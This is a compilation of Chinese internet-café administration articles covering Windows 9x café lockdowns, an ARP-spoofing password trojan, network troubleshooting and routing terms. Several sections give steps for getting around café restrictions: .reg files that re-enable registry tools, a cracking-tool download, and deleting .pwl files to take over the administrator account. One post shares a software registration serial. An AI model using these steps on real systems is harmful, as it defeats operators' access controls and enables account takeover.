    探秘难度：★★☆☆☆
    探秘方法：屏蔽鼠标右键菜单后，不能新建文件。此时网吧里常用《超级兔子》中的“安全限制全选”+“屏蔽本地硬盘”+《美萍》来实现的（网吧中最流行的管理软件一般是《美萍》，本系列如果没有特别说明都是在《美萍》下的操作），但这也是挡不住的!在网页中遇到禁用右键的情况我们有许多办法来解决，其实这些方法中有的也能移植到操作系统中的。就介绍最常用的也最有效的一种方法吧：在需要操作的文件或快捷图标上先点住右键不放，再点下左键，然后松开左键，最后松开右键，这时熟悉的右键菜单便呈现在眼前了。另外还有一招更普通，用鼠标左键单击选中文件，同时按住“Shift+F10”键，即可在资源管理器中显示出鼠标的右键菜单。

    六.下载　漏洞
    突破下载封锁　---不难
    网络诱惑何其多呀，比如精美图片、搞笑程序，哪个不想拉下来到本地的机子里瞅瞅呀，可在网管软件下，下载却不成，不用着急的，接着再看……
    探秘欲望度：★★★★★
    探秘方法：虽然标榜探秘难度为三星级，但只要能利用前面提到的访问硬盘的漏洞以及IE中的文件和工具菜单的漏洞，下面这招就只是水到渠成了。当能访问硬盘以后，通过“C:\windows\start　menu”中的快捷方式，你可以自由地使用系统的“开始”菜单启动下载程序，或者直接进入下载软件目录启动下载程序，这样就可以不怕IE的下载限制而进行下载了。
    如果需要用IE下载时，你只需要点击“工具”→“Internet选项”→“安全”→“默认级别”菜单。然后在需要下载的链接上单击鼠标右键，选择“目标另存为”保存即可。或者选择“安全”→“自定义级别”里选择“下载”，选择“启用”，“确定”后即可。

    七、文件操作漏洞
    删除文件----　简单
    这是一个注重隐私的时代，我的银行卡密码被别人知道了岂不是大大不妙，所以很多时候，在网吧上网，删除自己留在网吧电脑里的私人文件是很重要的，但网吧都安装了管理软件，所以很难进行这样的操作，别急，下面有一种方法让你办到，这样你就不会担心自己的隐私被别人发现啦。
    探秘欲望度：★★★★☆
    探秘难度：★★★☆☆
    探秘方法：利用输入法漏洞，输入法漏洞不是中文Win2000的漏洞吗?没错!就是利用这个方法来打开硬盘进行操作哦。方法很简单：按“Ctrl+Shift”打开微软拼音输入法（如没有用其它输入法也可，方法类似），然后将光标插入会员卡号的文本输入框内，接着开始往里面输入任意一个拼音字母，然后就会出现拼音的状态条，在状态条上点击右键，或用键盘上的属性键，就会出现一个下拉菜单，选择其中的定义词组，就算系统限制右键，在这也不管用，然后选择文件菜单里面的保存，就会调出保存对话框，然后随便选择一个文件夹，点击右键，选择资源管理器，打开，一切就OK啦!现在你就可以删除自己的隐私文件了。如果鼠标被限定在那个锁定窗口内，就用键盘操作。此法百试百灵，而且现在没有防御的方法。

    八、注册表漏洞
    封锁注册表　---很难
    那些喜欢玩电脑的高手，总是希望能过修改注册表来实现一些深层次的应用，希望能如自己在家一样有那种自由冲浪的感觉，此情咱们也是强烈渴望的，那么如何可以突破网管软件的限制，成功修改注册表?　　　　　　　探秘欲望度：★★★★☆
    探秘难度：★★★★☆
    探秘方法：由于网管软件在许多功能上的禁止使用（包括禁止使用注册表编辑器）是通过对注册表的修改来达到目的的，因此我们只要将注册表修改回来，就能取消网关的限制。这里我们用导入的方法进行修改。先打开一个记事本，在上面输入　REGEDIT4　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System　″DisableRegistryTool″=dword00000000　　　这个与第三个漏洞中所输入的是类似的，同样地保存为“.reg”文件或保存为“.txt”文件后将扩展名改为“.reg”，再双击执行该文件即可。

     九、禁用软件漏洞
     恢复“WinZip”本色　---好办
     唉，想起来也气煞人也，有些网吧连“WinZip”这种压缩工具软件都不能使用，那辛辛苦苦从网上拖个需要解压的程序下来，岂不是又浪费银子又浪费时间。不过话虽如此，网吧也有他们的难处，有些不守规矩的网民就喜欢用点这些软件，来搞搞破坏什么的，用它们来改改注册表什么的，而且是乱改，不像我，改注册表只是为了使“WinZip”能使用，嗯，好的，下面这种方法就是如何通过改注册表来使用“WinZip”。
    探秘欲望度：★★★☆☆
    探秘难度：★★★★☆
    探秘方法：我们这次要做的当然还是利用IE与系统结合的漏洞，在IE地址栏中用中文输入“桌面”回车。
    如此一来我们熟悉的桌面又以窗口的形式打开啦，现在我们要做的和上面要做的一样：新建一个文本文档，然后输入这么一行：　REGEDIT4　HKEY_LOCAL_MACHINE\Software\Mpsoft\Smenu　″unzipped″=dword00000000　　　然后保存为.reg文件或保存为.txt文件后，将扩展名改为.reg，在执行该文件就一切搞定。

    十、定制IE浏览器漏洞
     定制IE浏览器---　随心
     在网吧上网，总喜欢个性一点，比如开启新的IE就会自动连接到自己最喜欢的网站上，或者关掉网页的“声音”和“动画”，让浏览更加流畅。可是这个必须到“工具”栏里“Interner选项”里设置，而这个选项往往是被屏蔽了的。其实把选项变回来也是很简单的。
    探秘欲望度：★★★☆☆
    探秘难度：★★★☆☆
    探秘方法：在前面我们已经能够访问硬盘了，所以此时只需要到系统“System”目录下将名为“Inetcpl”的文件扩展名改为“.cpl”，这时“工具”栏里“Internet选项”便出来了。非常简单哦。这样，我们就可以设置我们喜欢的IE了


网吧管理有妙招

《一键清理系统垃圾》

网吧管理有妙招

    随着ISDN的全面开通，上网费用的下调,城市网民、网吧如雨后春笋般涌现,但网吧的管理却令不少业主伤神不少。
    笔者从多次的网吧维护中发现，多次网络崩溃均为网民无意间闯入“禁区”更改系统设置所致，笔者查阅有关资料后，用修改注册表的方法优化系统设置,收到了很好的效果。现以95/98操作系统为例介绍给大家,以求资源共享。
    1.首先在桌面新建数个热门网站的快捷图标。
    2.删除桌面上的“网上邻居”及“Internet”图标。
    3.限制用户使用其它注册表工具修改注册表(仅能用95/98自带windows 编辑器)方法：
    a.启用注册表
    b.打开HKEY_CURRENT_USER \SoftWare\Microsoft\Windows\ CurrentVersion\Policies\system
    c.在此分支下新建一个DWORD值的键名“disable registry tools
    ”，且赋值为“１”
    d.关闭注册表。
    4.屏蔽控制面板图标
    方法：
    a.打开HKEY_CURRENT_ USER\SoftWare\ Microsoft\ Windows\CurrentVersion\ Policies\Explorer分支
    b.在此分支下新建一个DWORD值的键名“nosetfolders”,且赋值为“１”
    c.关闭注册表。
    5．使系统退出不保存环境设置
    方法：
    a.打开HKEY_CURRENT_ USER\SoftWare\Microsoft\ Windows\CurrentVersion\ Policies\Explorer分支
    b.在此分支下新建一个DWORD值的键名“nosavesettings”,且赋值为“１”
    c.关闭注册表
    6 禁用MS-DOS
    方法：
    a打开HKEY_CURRENT_ USER\SoftWare\ Microsoft\Windows\CurrentVersion\ Policies\Explorer分支
    b.在此分支下新建一个主键“WinOldApp”,在主键下新建一个DWORD值的键名“disabled”,且赋值为“１”
    c.关闭注册表
    重新启动计算机。
    当然，在系统调试好以后，用GHOST对系统分区或整个磁盘作个镜像备份也是必可少的，在代理服务器中加上防火墙是防止黑客攻击的最有效措施。

返回


《一键清理系统垃圾》


网吧频繁掉线

《一键清理系统垃圾》

网吧频繁掉线

各位仁兄大家好：
相信在网管在网吧工作时都会遇到网络掉线的问题，在无法查出掉线的原因时你的老板总是用异样的眼光怀疑你的能力吧！，而你在努力过之后也无法查到掉线原因你自己的也包括也会怀疑自己的能力。现在我就给大家说说传奇杀手引起网吧掉线的原因，也许我说的不是你要的问题，但总会给你们一起帮助，这是我亲身经历过的。或许你在网吧查到关于网吧掉线的原因比我说的要详细，但是亲身经历过网吧掉线的问题我总是想与大家一起来分享。现在我来和大家说说网吧传奇杀手引起网吧掉线的全过程吧！
在2006年3月5号以后我的网吧就频繁掉线。我在检查时，却怎么也找不到原因。我查过病毒击攻，黑客入侵，网线，交换机，路由器后，我的目标落在了路由器上，因为在掉线后马上重启路由器，可以马上连接上网。后来我见意老板换一个路由器。结果没过两天还是频繁掉线。我真的没有办法了。后来请过网通的工作人员来查查结果，他也是没有办法。在每次上班的时候老板总是用不信认的眼光看我。我真的是苦恼呀。自己真是无能，我是一个合格的网管吗！~~~`
在网上论坛的时候网友们都说是我的路由器有问题，可是我换过了，结果还是一样的，在一次偶然的时候我在网上发现了传奇杀手这个病毒的文章，看过之后我简直要发狂了，于是我照上面的提示，做了一遍：
arp /a 发现我的七号机器，和路由器的MAC地址是一样的。这说明我中了传奇杀手这个病毒，真是一个无意中的兴奋啊！~~
网吧传奇杀手简介：
网吧传奇杀手”病毒是瑞星全球反病毒监测网，在2004年7月14日截获一个专门窃取“传奇”游戏密码的恶性木马病毒，并命名为“网吧传奇杀手（Trojan.PSW.LMir.qh）”。“网吧传奇杀手”病毒破解了《传奇2》的加密解密算法，通过截取局域网中的数据包，然后分析《传奇》游戏通讯协议的方法截获用户的信息。在局域网中运行这个病毒后，就可以获得整个局域网中传奇玩家的帐户和密码等信息。
传奇杀手工作过程：
网吧传奇杀手”木马病毒的工作原理，其实是对局域网中的机器进行Arp欺骗，虚拟网吧内部的网关地址，以此来收集局域网中传奇游戏登录信息，通过解析《传奇2》加密方式从而得到用户信息的破坏性软件。该软件只要在网吧的任何一台客户机上安装并且运行，就可以获取整个网吧内所有的传奇游戏登录信息。
网吧传奇杀手”病毒工作时，首先在将安装有“网吧传奇杀手”机器的网卡MAC地址通过Arp欺骗广播至整个局域网，使局域网中的工作站误认为安装“网吧传奇杀手”的机器是该局域网的网关。由于局域网中的所有信息，都必须通过网关来中转，当网吧有此病毒在运行时，所有的传奇玩家信息便绕过了真正的网关，传输到安装有“网吧传奇杀手”的机器中。当病毒程序搜集到局域网中的相关信息后，通过解密《传奇2》的游戏通讯协议，可以获得所有传奇游戏玩家的帐户名称和密码。这样，“网吧传奇杀手”木马病毒可以轻松盗取传奇玩家的帐户信息。
“网吧传奇杀手”木马病毒发作特征
①网络连接短暂中断
    当“网吧传奇杀手”病毒发作时，网吧所有的机器由于失去了真正的网关地址，网络连接会出现短暂中断，当病毒搜集《传奇2》玩家信息操作完成后，网络便恢复正常。网络中断时间，一般会在30秒到几分钟之间，持续时间不会太长。
    ②网络中出现相同的MAC地址
    病毒发作时，我们使用IPbook超级网上邻居、网吧过滤王实名制管理软件等网络管理软件查看网络时，会发现局域网中存在着相同的MAC地址。如果有多台机器安装了“网吧传奇杀手”木马病毒，局域网中则会出现不同的IP地址中却存在相同的MAC地址。
如下是我的操作：
arp /a
Interface:192.168.1.41---0*1003
192.168.1.1 00-14-78-b1-ba-1e dynamic
192.168.1.6 00-14-2a-73-ac-84
192.168.1.7 00-14-78-b1-ba-1e
…………………………………………
ipconfig /all
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator>ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : o41
   Primary Dns Suffix　. . . . . . . :
   Node Type . . . . . . . . . . . . : Broadcast
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
   Connection-specific DNS Suffix　. :
   Description . . . . . . . . . . . : Realtek RTL8139 Family PCI Fast Ethernet
NIC
   Physical Address. . . . . . . . . : 00-14-2A-84-D6-17
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.1.41
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 202.96.64.68
这说明：我的7号机器和路由器的MAC地址是一样的，也就是说我中了传奇杀手木马了。
后来我就彻底的把七号机器重新克了一下。果然就是个问题现在已经好了。
总结：我们遇到这样的问题，解决的最好办法就是把网卡MAC地址与路由的MAC地址捆绑这样不会让传奇杀手有机可程，现在瑞星的最新升级病毒库包里可以查杀传奇杀手。好了就说这么多吧希望能给大家带来快乐。
现在瑞星2006的18.18.40最新的病毒库可以查杀网吧传奇杀手木马,卡巴最新的病毒库也可以查杀.要是有的朋友中了这类木马可以先用网络执法官收索网吧中客户机的mac址是否与路由器的mac地址一样,只要有客户机与路由器的mac地址一样,你就可以确定是那台客户机中了木马.这样能大大的提升收索效率.

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


网吧频繁掉线解析与解决方法

《一键清理系统垃圾》

网吧频繁掉线解析与解决方法

现在频繁掉线的网吧很多.但为何掉线.许多网管朋友.不是很清楚.网吧掉线的原因很多.现在我给大家讲一下现在很流行的一种木马.<传奇网吧杀手>.基本上东北地区的网吧都被这一木马弄的身心疲惫.但是现在有解决的方法了.
中病毒特征: 网吧不定时的掉线.(重启路由后正常),网吧局域网内有个别机器掉线.
木马分析 : 传奇杀手木马,是通过ARP欺骗,来或取局域网内发往外网的数据.从而截获局域内一些网游的用户名和密码.
木马解析:中木马的机器能虚拟出一个路由器的MAC地址和路由器的IP.当病毒发作时,局域网内就会多出一个路由器的MAC地址.内网在发往外网的数据时,误认为中木马的机器是路由器,从而把这些数据发给了虚拟的路由器.真正路由器的MAC地址被占用.内网的数据发出不去.所以就掉线了.
解决办法:守先你下载一个网络执法官,他可以监控局域网内所有机器的MAC地址和局域网内的IP地址.在设置网络执法官时.你必须将网络执法官的IP段设置和你内网的IP段一样.比如说:你的内网IP是192.168.1.1------192.168.1.254你的设置时也要设置192.168.1.1------192.168.1.254.设置完后,你就会看到你的内网中的MAC地址和IP地址.从而可以看出哪台机器中了木马.(在多出的路由器MAC地址和IP地址和内网机器的IP地址,MAC地址一样的说明中了传奇网吧杀手)要是不知道路由器的MAC地址,在路由器的设置界面可以看到.发现木马后.你还要下载瑞星2006最新版的杀病毒软件(3月15日之后的病毒库).在下载完之后必须在安全模式下查杀(这是瑞星反病毒专家的见意)反复查杀(一般在四次就可以了)注意查完后杀病毒软件不要卸载掉.观查几天(这是我个人的经验.在卸后第三天病毒还会死灰复燃,我想可能是注册表里还有他的隐藏文件.在观查几天后正常就可以卸载掉了.
注:还原精灵和冰点对网吧传奇杀手木马不起做用.(传奇杀手木马不会感染局域网.不要用硬盘对克,对克跟本不起任何做用.而且还会感染到母盘上.切记!)
最好主机安装上网络执法官,这样可以时时监控局域网内的动态,发现木马后可以及时做出对策)
下面是传奇网吧杀手木马的文件:
文件名：　　　文件路径：　　　　　　　　 病毒名：
a.exe>>b.exe　 c:\windows\system32　　　 Trojan.psw.lmir.jbg
235780.dll　　 c:\windows\　　　　　　　 Trojan.psw.lmir.aji
kb2357801.log　c:\windows\　　　　　　　 Trojan.psw.lmir.jhe
Q98882.log　　 c:\windows\　　　　　　　 Trojan.psw.lmir.jhe
kb2357802.log　c:\windows\　　　　　　　 Trojan.psw.lmir.jbg
Q90979.log　　 c:\windows\　　　　　　　 Trojan.psw.lmir.jhe
Q99418.log　　 c:\windows\　　　　　　　 Trojan.psw.lmir.jbg
ZT.exe　　　　 c:\windows\program Files\浩方对战平台 病毒名：Trojan.dL.agent.eqv
a[1].exe>>b.exec:\documents and sttings\sicent\local settings\Temporary Internet Files\content.IE5\Q5g5g3uj
病毒名:Trojan.psw.lmir.jbg
有需要瑞星2006 18.18.22(3月15日的版本)和网络执法官2.75注册版的软件请把邮箱留下.
(各位朋友.瑞星杀毒软件文件过大邮箱发送不了.请大家下载瑞星个人18.18.20版杀毒软件我现在给大家提供注册码.希望大家原谅.)
SN=P5V6EH-61FHJK-9G0SS7-C4D200
ID=5B3C5BJ4Y125
（网络执法官可以批量MAC捆绑，到执法官的局域网MAC界面，全选后单击右键会出现批量MAC捆绑．做完捆绑以后，ARP要是在次攻击时他会报警，出现的假MAC是为非法．网络执法官会终止他的一切操作．）这样可以解决ARP在次攻击有朋友想认识我．请加16742481　进入时请说鹰王介绍的就可以了．这是一个计算机论坛．

________________________________________________________________________________
硬件造成网速慢或掉线的解决方法
引起网吧频繁和网速慢的原因很多,50楼的朋友问了一个问题.这个问题非常典型,一些网管朋友找不出原因. 给你们看一个实例:(此例只做见意) 一个网吧用的是10M网通光纤 网络频繁掉线(非ARP和病毒攻击)或网速达不到要求而且非常慢.换过路由器和交器机,网线也测式过没有问题.在网通机房测式结果是每秒1.2M,已经达到10M光纤的速度,可到网吧的终端后网速只达到200K或达不到200K.一些网管朋友找不出原因.(一般出现这样的原因出现在光纤收发器上)
见意你:在光纤收发器(俗称:光纤猫)分流下直接插到机器上,正确的设置完参数后直接测式网速,看一下网速能达到多少.要是达到1M左右说明网通机房分流到光纤收发器这一段是正常的.反过来说要是达到不要求说明,从网通机房分流到光纤收发器这段距离出现问题.一般情况下应该是光纤收发器出的问题.光纤收发器可以到网通公司更换,要是测式完后正常在从光纤收发器连接到路由器上.在从路由器的LAN接口上分流下连接一台机器测式网速是多少.要是达不到要求说明问题出现在路由器上．要是能达到相对应的速度说明正常．然后在从路由器到交换机.以此论推．这种方法非常实用．相信要是硬件问题应该能解决．


网吧系统攻防

《一键清理系统垃圾》

网吧系统攻防

     自从有了电脑和网络以来，限制与反限制就成了永恒的话题。系统管理员为了系统的安全稳定需要设置种种障碍，而用户为了方便想要突破层层阻碍，于是，有了我们这篇抛砖引玉的“网吧系统攻防”……
    ONE
    胖子（独白）:今年网络大泛滥，到处都有网吧，有网吧的地方一定需要网管，需要网管的地方就有我的事做。我叫胖子，我的职业是替人照看网吧，就是在工作的时候偷偷摸摸地蹭网上。
    胖子（独白）:24点，午夜。每天这个时候，都会有一个人来找我聊天，他叫Akey。这个人很有趣，每次都会带来些稀奇古怪的东西，这个习惯已经维持了很长一段时间。今天，他给我带来一篇帖子。
    Akey:不久前，我遇上一个人，送给我一篇帖子，他说那叫“网吧系统攻防”。看了之后，可以叫你失去以前对网吧系统安全的所有信任。我很奇怪，为什么会有这样的帖子。他说网吧里的虫儿们最大的烦恼，就是限制太多，如果把什么限制都破解掉，以后就可以自由自在地做你想做的事，那你说这有多开心。这篇帖子本来应该自己悄悄学的，不过我想你也会需要它，所以我们可以一起来看。
    胖子（独白）:对于这样狂傲的东西，我向来很难接受，所以这篇帖子我一直没有看。可能这帖子真的有用，从那天晚上开始，Akey看着我总是邪邪地笑。
     Akey（独白）:那天之后，每当想起胖子的网吧，我的手就开始痒。终于有一天，趁他那里人少的时候，我决定在他那里做个试验，让他明白自己的网吧有多么脆弱。
    TWO
    胖子（独白）:今天晚上，雨很大，网吧里的人出奇地少。Akey终于来了，幸好我已有了准备。
     Akey:看来这里也不是全无防备，至少每台计算机上都有正在流行的美萍安全卫士站着岗。
胖子:美萍锁定了计算机的屏幕，让它只能运行指定的程序，而且屏蔽掉了Windows的开始菜单和鼠标右键，连控制面板和显示属性也被它隐藏掉了。这样的功能，用来限制用户查看和修改硬盘上的目录和文件、修改系统设置，已经是绰绰有余。
    Akey:区区美萍，当然挡不住我，因为它允许运行的程序里，总是会有IE浏览器。在IE的地址栏里随便输入个硬盘上存在的路径，比如C:\或是C:\Windows，这个路径下的目录和文件就全都出来了。如果要运行原本被美萍锁住的程序，直接输入路径名和完整的文件名就行了。如果输入C:\Windows\Explorer.Exe，资源管理器就会出现在屏幕上。
    胖子:嗯……这一关算你过了，但控制面板的显示属性呢？改起来好像不大容易。
    Akey:在C:\Windows\System目录下，有些扩展名为Cpl的文件。你可以直接运行它们来看看。
    胖子（独白）:看着Akey顺手打开Sysdm.Cpl和Desk.Cpl，调出了系统属性和显示属性窗口，我知道这样的家伙是蒙不过去的了。
    Akey（独白）:虽然现在已经可以随意访问硬盘和运行程序，但开始菜单和鼠标右键的限制仍然存在，用起来还是不太方便。我照“网吧系统攻防”的介绍，在网上找到了一个专门破解美萍的工具。
    Akey:在http://intrsoft.yeah.net上，有一个叫Killmp的工具，据说是个叫Mole的高人留下的。它的体积只有23kB，很简单，很好用。就像那个叫洪七的杀手，虽然没有穿鞋，但刀很快。
     胖子（独白）:了解了美萍的脆弱后，我亲手运行了那个叫Killmp的工具，看着它很轻松地把美萍的所有密码清空，然后我按提示关掉电源，重新启动。心里好像有什么东西也跟着屏幕一道，一闪便黑了下去。
    Akey（独白）:重新启动后，美萍又自动地运行了。我在美萍的开始菜单里选择了退出系统，系统还装模作样地向我要密码。既然密码已经被Killmp清空，我毫不犹豫地直接按下确定。美萍就这样乖乖地退出了我的视线，熟悉的Windows界面又回来了。
    THREE
    胖子（独白）:美萍果然很不争气，我一怒之下把它踢出了计算机，不过我早有了第二手准备。我不停地劝Akey喝茶喝茶再喝茶，终于把这小子灌进了厕所。趁着空，我开始布置第二轮的防御。
    胖子（独白）:美萍的系统保护功能被破解掉，罪魁祸首是可以从IE里直接进入硬盘的目录。看来要保护系统，首先得隐藏硬盘。得动用Windows里的超级法宝——注册表编辑器Regedit了。
    胖子（独白）:从开始菜单里运行Regedit，找到HKEY CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\Explorer，在右窗格里新建一个Dword的值NoDrives。每个驱动器都有一个对应的赋值。A驱的值是2的0次方也就是1，B驱是2的1次方，C驱是2的2次方，而Z驱是2的25次方。如果同时要锁几个驱，就把这几个驱的值加起来。像我这样聪明的懒人，当然直接在键值栏里输了个十六进制数3ffffff，也就是十进制的67108863，这是从A到Z所有驱的值加起来的和，意思就是所有的驱动器了。
    胖子（独白）:这下把驱动器藏了个严实，总算可以松口气了，但活儿还没有完，还有好多重要的东西得保护起来，防止别人直接更改系统的设置，比如控制面板。
    胖子（独白）:还是在HKEY_CURRENT USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer下，我又新建了一个Dword的值NoSetFolders，给它赋上键值1。
    胖子（独白）:做完上面这步，用户已经无法更改控制面板和打印机了，但显示和任务栏的设置还没有被禁用。我知道这东西如果被留下来迟早会惹来麻烦，因为其他人还是可以更改计算机的显示属性和开始菜单，所以我的防御工事还没有建完。
    胖子（独白）:在HKEY_CURRENT_ USER\Software\Microsoft\Windows\CurrentVersion \Policies下新建主键System，又在System下新建一个Dword的值NoDispCPL，也给它赋上键值1。这就禁用了显示属性。
    胖子（独白）:回头找到HKEY_CURRENT_ USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explorer，新建了一个Dword的值NoSetTaskbar，键值为1。嘿嘿，任务栏属性也不能改了。
    胖子（独白）:需要保护的还有我的环境设置。在HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\Explorer下新建一个Dword值NoSaveSetting，值当然又是1了。
    Akey（独白）:其实我早就回来了，看到胖子在注册表上布置他的防御工事，我也不能闲着，赶紧在角落里找台空着的计算机吧。
    胖子（独白）:这小子居然厕所都可以上这么久，看来我还有时间让我的防守更完善一些。我先得在系统的开始菜单上做点手脚。
    胖子（独白）:开始菜单里的查找与运行，可能会给他突破防守的机会，我得把它禁掉。HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer下，我又建立了两个Dword值。用来禁掉查找功能的值是NoFind，用来禁掉运行功能的值是NoRun。两个键值都为1。
    胖子（独白）:鼠标的右键菜单也得禁用了，否则我心里始终不踏实。在HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion \Policies\Explorer下建个Dword值NoViewContextMenu，把值设成1。
    胖子（独白）:剩下的就是禁用程序了，否则我辛辛苦苦地设了半天，他只要调出Regedit，我的辛苦就都白费了。所以我找到HKEY_CURRENT_ USER\Software\Microsoft\Windows\CurrentVersion \Policies\System，新建一个Dword串值DisableRegistryTools，值为1。这样就无法再运行Regedit.exe来修改注册表了。
    胖子（独白）:Windows下的防守基本上完成了，但他还是可以从MS DOS方式进来。所以，还有一道门得堵上。在HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\下，创建一个主键WinOldApp，在它下面建Dword值Disadleb，键值为1，这样就禁用了MS DOS方式。
    再建一个Dword值NoRealMode，键值为1，这样让他在关闭系统时无法切换到MS DOS方式。
    胖子:哈哈，Akey你放马过来吧。
    FOUR
    AKey:我不应该回来。
    胖子:你现在后悔太晚了。
    AKey:别再让我喝茶了行吗？
    胖子:行！只要你破解得了我的防御。
    AKey（独白）:其实我的操作很简单，上网去收了个邮件，一封刚才在角落里给自己发来的邮件。邮件里有一个附件，附件的名字叫Uk.reg，里面只有这么一段文字:
    REGEDIT4
    [HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\System]
    "DisableRegistryTools"=dword:00000000
    AKey（独白）:执行Uk.reg后，运行Regedit的限制已经被取消了。这条防线又被攻破了。
    FIVE
    胖子:或许我应该建立管理员账号和用户账号，把所有的限制都加在用户的账号上，并且在登录时不允许按Esc避开身份验证。你知道，这个功能用注册表来设置并不很难。
    AKey:那我就用用户账号登录。运行OICQ，在消息管理器中随便选条信息来导出，然后在另存为窗口的文件名框内输入C:\Windows\*.pwl，就能找到所有用户的密码文件。在这里我就能看到管理员的账号名了。选择管理员的密码文件，按下键盘的Del键，就可以把你管理员的密码清空。
    AKey:当我重新登录计算机时，就可以用管理员的账号登录了。系统会很亲切地主动让我设定密码，这样，我就变成管理员了。而你，则只有去对付那些自己精心设置的限制。
    胖子:其实我可以做得更好，比如改变Reg文件的打开方式。
    AKey:但从DOS里还是可修改啊。我想你一定已经禁止了从Windows里进入DOS，但我还是可以在系统启动时按F8来进DOS。网吧里的计算机是没有软驱和光驱的，只能用硬盘来引导系统。你一定会在系统引导时为自己留一条路，让自己可以在Windows出问题时进行维护，所以你不会在启动时禁用F4、F5和F8。
    胖子:如果我只允许运行指定的程序呢？
    AKey:你这里是网吧，经常需要下载一些应用程序，或是一些新奇的软件。只允许运行指定的程序，满足不了你使用的需要。而且即使只运行指定的软件，我一样可以破你。
    AKey:http://intrsoft.yeah.net/，你可以去下载来看看。在下载保存时换个你所允许运行的程序的名字，比如Oicq.exe，覆盖你机器上真正的OICQ，这样就可以“合法”地运行了。然后你会发现，这个假的OICQ会帮你自动地修改掉注册表里一些关键的限制。防御不会被逐个攻破，只是一下子便灰飞烟灭了。
    AKey:而且你看到，我所做的，只是破解，而不是破坏。如果要破坏，我就在先打开的另存为窗口里，选几个系统的重要目录，然后按Del，我想你一定知道后果。
    胖子:真的没有绝对安全的方法了吗？
    Akey:一定有，我就知道其中的一条——把计算机用铁链子绑起来，不许人碰^_^。

作者：Akey
来源：计算机应用文摘


网络不通的解决之道

《一键清理系统垃圾》

网络不通的解决之道

《中国电脑教育报》郑兴航

    本文根据笔者多年使用和维护校园网的经验，从实践出发，以Windows 98和Windows 2000为例，谈谈网络不通这一故障的解决办法。

    在排除是本机系统核心故障所造成的原因后，网络不通经常是由以下几个方面因素造成的。

    1、网络配置不对

    一般情况下，在同一校园网内每一台机器所拥有的IP地址必须是惟一的，在同一子网内所有机器的子网掩码必须相同，默认网关必须是本机所在子网和校内其他子网能够进行信息交换的网卡的IP地址。为解决这类问题，可打开桌面的“网上邻居”的“属性”菜单，检查TCP/IP协议的配置数据，分析IP地址、子网掩码、默认网关配置是否正确，如果不正确，需重新配置。

    2、网络接口故障

    据我的工作经验，机器不能上网往往是由网线上的水晶头和网卡插口接触不良所引起（特别是经常需要移动的笔记本电脑）。遇到此类故障的做法是先把水晶头从网卡接口上拔下重新插一次，在保证网络接口已插紧的情况下，用ping命令进行测试，首先ping一下本机，然后再观察是否能ping通其他机器。例如本机的IP地址是192.168.0.2，校内另一台正在正常工作的机器的IP地址为192.168.0.3，在本机重新启动后在命令行状态下键入命令ping 192.168.0.3，如果屏幕上返回的信息是“Reply from 192.168.0.3 :bytes=32 time〈10ms ttl=128”之类的信息，说明问题已经得到解决；如果是“Requested time out”，说明网络不通，这时再发命令ping 192.168.0.2连接本机，如果信息仍然是“Requested time out”，说明所工作的机器网卡出现了物理故障，需要更换或修理；如果返回的信息是“Reply from 192.168.0.2 :bytes=32 time〈10ms ttl=128”，说明本机网卡没有问题。这时可将接头再拔下，观察水晶头上是否已生锈或者有灰尘，将其擦拭干净，再除掉网卡接口内的浮尘，接好后如上法重新测试，在大多数情况下即可解决问题。


网络工程师必懂的专业术语

《一键清理系统垃圾》

网络工程师必懂的专业术语

路由器问题：
            1、什么时候使用多路由协议？
            当两种不同的路由协议要交换路由信息时，就要用到多路由协议。当然，路由再分配也可以交换路由信息。下列情况不必使用多路由协议：
            从老版本的内部网关协议（ Interior Gateway Protocol，I G P）升级到新版本的I G P。
            你想使用另一种路由协议但又必须保留原来的协议。
            你想终止内部路由，以免受到其他没有严格过滤监管功能的路由器的干扰。
            你在一个由多个厂家的路由器构成的环境下。
            什么是距离向量路由协议？
            距离向量路由协议是为小型网络环境设计的。在大型网络环境下，这类协议在学习路由及保持路由将产生较大的流量，占用过多的带宽。如果在9
            0秒内没有收到相邻站点发送的路由选择表更新，它才认为相邻站点不可达。每隔30秒，距离向量路由协议就要向相邻站点发送整个路由选择表，使相邻站点的路由选择表得到更新。这样，它就能从别的站点（直接相连的或其他方式连接的）收集一个网络的列表，以便进行路由选择。距离向量路由协议使用跳数作为度量值，来计算到达目的地要经过的路由器数。
            例如，R I P使用B e l l m a n - F o r
            d算法确定最短路径，即只要经过最小的跳数就可到达目的地的线路。最大允许的跳数通常定为1 5。那些必须经过1
            5个以上的路由器的终端被认为是不可到达的。
            距离向量路由协议有如下几种： IP RIP、IPX RIP、A p p l e Talk RT M P和I G R P。
            什么是链接状态路由协议？
            链接状态路由协议更适合大型网络，但由于它的复杂性，使得路由器需要更多的C P
            U资源。它能够在更短的时间内发现已经断了的链路或新连接的路由器，使得协议的会聚时间比距离向量路由协议更短。通常，在1
            0秒钟之内没有收到邻站的H E L
            LO报文，它就认为邻站已不可达。一个链接状态路由器向它的邻站发送更新报文，通知它所知道的所有链路。它确定最优路径的度量值是一个数值代价，这个代价的值一般由链路的带宽决定。具有最小代价的链路被认为是最优的。在最短路径优先算法中，最大可能代价的值几乎可以是无限的。
            如果网络没有发生任何变化，路由器只要周期性地将没有更新的路由选择表进行刷新就可以了（周期的长短可以从3 0分钟到2个小时）。
            链接状态路由协议有如下几种： IP OSPF、IPX NLSP和I S - I S。
            一个路由器可以既使用距离向量路由协议，又使用链接状态路由协议吗？
